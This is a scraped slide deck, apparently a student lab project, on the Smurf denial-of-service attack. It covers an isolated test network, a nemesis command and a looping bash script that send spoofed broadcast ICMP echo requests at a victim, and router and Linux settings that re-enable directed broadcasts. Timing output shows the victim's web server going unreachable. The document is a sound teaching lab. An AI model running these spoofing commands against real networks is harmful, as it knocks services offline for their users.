Smurf Attack Farhan Sajjad Outline Smurf Attack What

  • Slides: 17
Download presentation
Smurf Attack Farhan Sajjad

Smurf Attack Farhan Sajjad

Outline �Smurf Attack �What is a Smurf Attack? �How is it Engineered? �Project 1

Outline �Smurf Attack �What is a Smurf Attack? �How is it Engineered? �Project 1 �Test Environment �Conducting the Attack �Results and Observations �References �Questions?

What is a Smurf Attack? �Denial of Service Attack using spoofed broadcast ping messages.

What is a Smurf Attack? �Denial of Service Attack using spoofed broadcast ping messages.

How is it Engineered? �Essentially, by “spoofing” a broadcasted ICMP Echo request with the

How is it Engineered? �Essentially, by “spoofing” a broadcasted ICMP Echo request with the victim’s IP address as the sender The ICMP Header

Sample Spoof root@jotil. Move# nemesis icmp -v -i 8 -c 0 -S 192. 168.

Sample Spoof root@jotil. Move# nemesis icmp -v -i 8 -c 0 -S 192. 168. 0. 5 -D 192. 168. 0. 255 -H 08: 00: 27: 29: 4 C: F 0 ICMP Packet Injection -=- The NEMESIS Project Version 1. 4 (Build 26) [MAC] 08: 00: 27: 29: 4 C: F 0 > FF: FF: FF: FF [Ethernet type] IP (0 x 0800) [IP] 192. 168. 0. 5 > 192. 168. 0. 255 [IP ID] 3121 [IP Proto] ICMP (1) [IP TTL] 255 [IP TOS] 0 x 00 [IP Frag offset] 0 x 0000 [IP Frag flags] [ICMP Type] Echo Request [ICMP Code] Echo Request [ICMP ID] 57730 [ICMP Seq number] 8233 Wrote 42 byte ICMP packet through linktype DLT_EN 10 MB. ICMP Packet Injected

The Test Environment

The Test Environment

The Test Environment (continued) �All the Linux machines had Wireshark installed on them �The

The Test Environment (continued) �All the Linux machines had Wireshark installed on them �The attacker had Nemesis installed on it, to generate spoofed IP packets �The victim had HTTP server on it, to check its availability �Had to turn on No-IP Directed Broadcast �Linux OS: root@jotil. Move# echo "0" | cat > /proc/sys/net/ipv 4/icmp_echo_ignore_broadcasts �Cisco IOS: Router. C(config)#int f 0/0 Router. C(config-if)#ip directed-broadcast

Conducting the Attack �Created a small payload file of size 1472 bytes �Ran a

Conducting the Attack �Created a small payload file of size 1472 bytes �Ran a small script at the attacking machine, which looped to send spoofed ICMP packets #!/bin/bash i=10000 while test $i != 0 do nemesis icmp -i 8 -c 0 -S 192. 168. 0. 5 -D 192. 168. 0. 255 -H 00: 06: 29: DF: 2 A: DA -P payload_file echo "$i" i=`expr $i - 1` done

Results The Attacker’s Screenshot

Results The Attacker’s Screenshot

The Victim’s Screenshot During Attack

The Victim’s Screenshot During Attack

The Victim’s Screenshot After Attack

The Victim’s Screenshot After Attack

The Observer’s Screenshot

The Observer’s Screenshot

root@hpgcpc 06: /home/farhan# time wget 192. 168. 0. 5 --2009 -11 -13 20: 49:

root@hpgcpc 06: /home/farhan# time wget 192. 168. 0. 5 --2009 -11 -13 20: 49: 45 -- http: //192. 168. 0. 5/ Connecting to 192. 168. 0. 5: 80. . . connected. HTTP request sent, awaiting response. . . 200 OK Length: 177 [text/html] Saving to: `index. html' 100%[===================>] 177 --. -K/s in 0 s 2009 -11 -13 20: 49: 45 (15. 1 MB/s) - `index. html' saved [177/177] real 0 m 0. 008 s user 0 m 0. 004 s sys 0 m 0. 000 s root@hpgcpc 06: /home/farhan# time wget 192. 168. 0. 5 --2009 -11 -13 20: 50: 03 -- http: //192. 168. 0. 5/ Connecting to 192. 168. 0. 5: 80. . . failed: Connection timed out. Retrying. . --2009 -11 -13 20: 59: 36 -- (try: 4) http: //192. 168. 0. 5/ Connecting to 192. 168. 0. 5: 80. . . connected. HTTP request sent, awaiting response. . . 200 OK Length: 177 [text/html] Saving to: `index. html' 100%[===================>] 177 --. -K/s in 0 s 2009 -11 -13 20: 59: 36 (18. 1 MB/s) - `index. html' saved [177/177] real 9 m 33. 041 s user 0 m 0. 008 s sys 0 m 0. 000 s

Observations �Number of participating nodes crucial to the effectiveness of the attack �Hardly effected

Observations �Number of participating nodes crucial to the effectiveness of the attack �Hardly effected the CPU or Memory utilization of the Victim, however its network resources were overwhelmed and its services were unreachable �Networked devices after 1998 has turned off No -IP directed broadcasts, so it is difficult to conduct such attacks, however Smurf Amplifiers exists!

References [1] Smurf attack, from Wikipedia: http: //en. wikipedia. org/wiki/Smurf_attack [2] smurf. c, [Online

References [1] Smurf attack, from Wikipedia: http: //en. wikipedia. org/wiki/Smurf_attack [2] smurf. c, [Online document] Available: http: //personal. telefonica. terra. es/web/alexb/e/smurf. c [3] The Internet Control Message Protocol, from Wikipedia: http: //en. wikipedia. org/wiki/Internet_Control_Message_Protocol [4] Ping, from Wikipedia: http: //en. wikipedia. org/wiki/Ping [5] The ICMP Header. [Online document] Available: http: //blog. csdn. net/xuhx/archive/2008/04/16/2297266. aspx [6] How a Broadcast Address Works. [Online document] Available: http: //learn-networking. com/network-design/how -a-broadcast-address-works [7] Denial-of-service attack, from Wikipedia: http: //en. wikipedia. org/wiki/Denial-of-service_attack [8] Nemesis Packet Injection Tool Suite. [Online document] Available: http: //nemesis. sourceforge. net/ [9] Manpage of NEMESIS-ICMP. [Online document] Available: http: //nemesis. sourceforge. net/manpages/nemesisicmp. 1. html [10] Wireshark. [Online document] Available: http: //www. wireshark. org/ [11] Securing Cisco Routers with No IP Directed-Broadcast. [Online document] Available: http: //learnnetworking. com/network-security/securing-cisco-routers-with-no-ip-directed-broadcast [12] Craig A. Hugen, The latest in denial of service attacks: "Smurfing". Description and information to minimize effects. [Online document] Available: http: //www. pentics. net/denial-of-service/white-papers/smurf. cgi [13] CERT® Advisory CA-1998 -01 Smurf IP Denial-of-Service Attacks. [Online document] Available: http: //www. cert. org/advisories/CA-1998 -01. html [14] Smurf Attack. [Online document] Available: http: //www. softpanorama. org/Net/Internet_layer/ICMP/smurf_attack. shtml [15] Smurf Amplifier Registry [Online document] Available: http: //www. powertech. no/smurf/ [16] Brian Hatch, Firewalling /proc entries [Online document] Available: http: //www. hackinglinuxexposed. com/articles/20021015. html [17] Todd Lammle, CCNA: Cisco Certified Network Associate Study Guide. ISBN: 978 -0470110089. Publisher: Sybex; 6 edition (August 29, 2007).

Questions?

Questions?

Thank You!

Thank You!